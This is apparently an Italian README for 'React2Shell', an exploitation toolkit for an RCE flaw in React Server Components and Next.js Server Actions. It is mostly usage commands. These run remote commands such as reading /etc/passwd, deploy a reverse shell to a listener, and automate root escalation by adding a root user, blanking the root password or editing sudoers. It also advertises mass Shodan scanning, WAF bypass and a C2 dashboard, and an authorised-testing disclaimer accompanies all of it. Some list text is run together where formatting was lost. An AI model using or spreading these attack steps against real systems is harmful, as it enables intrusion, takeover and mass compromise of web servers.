Toolkit di sfruttamento elite per CVE-2025-55182 (RCE su React Server Components). Payload polimorfici asincroni, bypass avanzato di WAF/CDN, rotazione proxy, scansione di massa Shodan/Censys, auto-pwn + reverse shell, template Nuclei, laboratorio K8s e dashboard C2. Autore: Sudeepa Wanigarathna – strettamente per red team autorizzati e penetration testing.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Framework di sfruttamento di livello professionale per la vulnerabilità RCE delle Server Actions di Next.js (React2Shell). Dimostra la catena di attacco completa dall'accesso iniziale all'escalation dei privilegi di root.
Capacità:
# Verifica vulnerabilità
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Esegui comando
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Sfruttamento completo: RCE → Enumerazione → Accesso Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Motore di exploit principale (400+ righe)
├── demo_exploit.py # Catena di attacco automatica (290+ righe)
├── interactive_shell.py # Shell interattiva (280+ righe)
├── reverse_shell_handler.py # Listener reverse shell (180+ righe)
├── post_exploit/
│ ├── linux_enum.py # Enumerazione del sistema (330+ righe)
│ ├── priv_esc.py # Escalation dei privilegi (320+ righe)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Documentazione completa d'uso
├── QUICKSTART.md # Riferimento rapido
└── BANNER.txt
# Verifica vulnerabilità
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Esegui comandi
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Diverse varianti di payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# Con offuscamento
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Avvia shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Comandi disponibili:
# - execute <cmd> : Esegui comando shell
# - enum : Esegui enumerazione completa
# - escalate : Tenta escalation dei privilegi
# - upload <local> <remote> : Carica file
# - download <remote> <local>: Scarica file
# - shell <lhost> <lport>: Distribuisci reverse shell
# - info : Mostra informazioni sessione
# - exit : Esci
# Terminale 1: Avvia listener
python3 reverse_shell_handler.py --lport 4444
# Terminale 2: Distribuisci shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Catena completa: Scoperta → RCE → Enumerazione → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Il framework implementa una catena di sfruttamento completa in 6 passaggi:
id/etc/shadow e elencando /rootBinari SUID (GTFOBins)
File /etc Scrivibili
/etc/passwd - Aggiungi nuovo utente root/etc/shadow - Azzera la password di root/etc/sudoers - Concedi sudo NOPASSWDFuga Docker
Exploit del Kernel
Capabilities Linux
pip install -r requirements.txt
Dipendenze:
EXPLOITATION_GUIDE.md - Guida completa all'uso con esempiQUICKSTART.md - Riferimento rapido per i comandi comuniAVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Utilizzare solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta per il test.
L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Utilizzo a proprio rischio.
Questo framework è progettato per:
Licenza MIT (Solo a Scopi Educativi)
Sudeepa Wanigarathna
Versione: 1.0
Ultimo Aggiornamento: Dicembre 2025
Per istruzioni dettagliate sull'uso, consultare EXPLOITATION_GUIDE.md